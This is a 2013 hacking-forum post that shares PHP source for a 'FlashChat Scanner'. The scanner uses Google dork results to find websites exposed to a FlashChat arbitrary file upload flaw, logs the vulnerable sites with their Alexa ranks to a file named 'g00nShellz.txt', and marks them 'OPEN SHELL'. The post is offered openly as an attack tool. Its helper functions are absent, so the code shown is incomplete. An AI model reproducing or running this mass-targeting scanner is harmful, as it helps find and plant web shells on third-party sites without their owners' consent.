Versus71 Posted November 3, 2013 Share Posted November 3, 2013 FlashChat Scanner[For FlashChat Arbitrary File Upload Vuln]Note: the bug was found by somebody else Google Dork: <?php if(isset($_POST['dork']{0})) { $file = fopen("g00nShellz.txt","a"); echo ' Scanning has been started... Good luck! ;)'; letItBy(); for($googlePage = 1; $googlePage <= 50; $googlePage++) { $googleResult = google_that($_POST['dork'], $googlePage); if(!$googleResult) { echo 'Finished scanning.'; fclose($file); break; } for($victim = 0; $victim < sizeof($googleResult); $victim++){ $result = check_vuln($googleResult[$victim]['unescapedUrl']); $alexa = getAlexa($googleResult[$victim]['unescapedUrl']); echo "Currently checking..."; if($result != "Fail!"){ $line = $result . " | " . $alexa . "\n"; fwrite($file,$line); echo ''; echo "SITE: {$googleResult[$victim]['unescapedUrl']} - VULNERABLE\n"; echo "OPEN SHELL"; echo " - Alexa Rank = " . $alexa . ""; } else { echo ''; echo "{$googleResult[$victim]['titleNoFormatting']} - NOT VULNERABLE"; if($alexa <= 50000) echo " - " . $alexa; echo "\n"; } letItBy(); } } echo ''; }?>Coded by g00n.Greets: Xploiter.net Link to comment Share on other sites More sharing options...
Recommended Posts